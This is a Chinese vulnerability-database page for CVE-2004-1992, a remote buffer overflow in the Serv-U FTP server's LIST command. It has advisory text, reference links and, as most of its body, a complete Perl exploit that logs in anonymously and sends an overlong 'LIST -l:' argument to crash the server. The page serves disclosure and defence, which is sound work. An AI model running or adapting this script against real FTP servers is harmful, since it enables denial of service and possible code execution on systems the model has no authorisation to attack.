Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107890 漏洞类型 缓冲区错误
发布时间 2004-04-20 更新时间 2020-07-29
CVE编号 CVE-2004-1992 CNNVD-ID CNNVD-200404-075
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24029
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-075
|漏洞详情
SolarWinds Serv-U File Server是美国SolarWinds公司的一款文件传输服务器。 SolarWinds Serv-U File Server 5.0.0.6之前版本中存在缓冲区错误漏洞。远程攻击者可借助超长‘-l’参数利用该漏洞造成拒绝服务(崩溃),并可能执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/10181/info

Reportedly Serv-U is affected by a remote buffer overflow vulnerability in the list parameter. This issue is due to a failure of the application to properly validate buffer boundaries during processing of user input.

Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system with the privileges of the user that invoked the vulnerable application, although this has not been confirmed.

#!/usr/bin/perl

use IO::Socket;

$host = "www.example.com";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2116",
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;
|参考资料

来源:XF
名称:servu-list-command-bo(15913)
链接:http://xforce.iss.net/xforce/xfdb/15913
来源:SECUNIA
名称:11430
链接:http://secunia.com/advisories/11430
来源:BID
名称:10181
链接:http://www.securityfocus.com/bid/10181
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/5ZP0G2KCKA.html
来源:OSVDB
名称:5546
链接:http://www.osvdb.org/5546
来源:SECTRACK
名称:1009869
链接:http://securitytracker.com/id?1009869
来源:NTBUGTRAQ
名称:20040503Serv-ULIST-lParameterBufferOverflow
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m=108359620108234&w=2
来源:BUGTRAQ
名称:20040503Serv-ULIST-lParameterBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108360377119290&w=2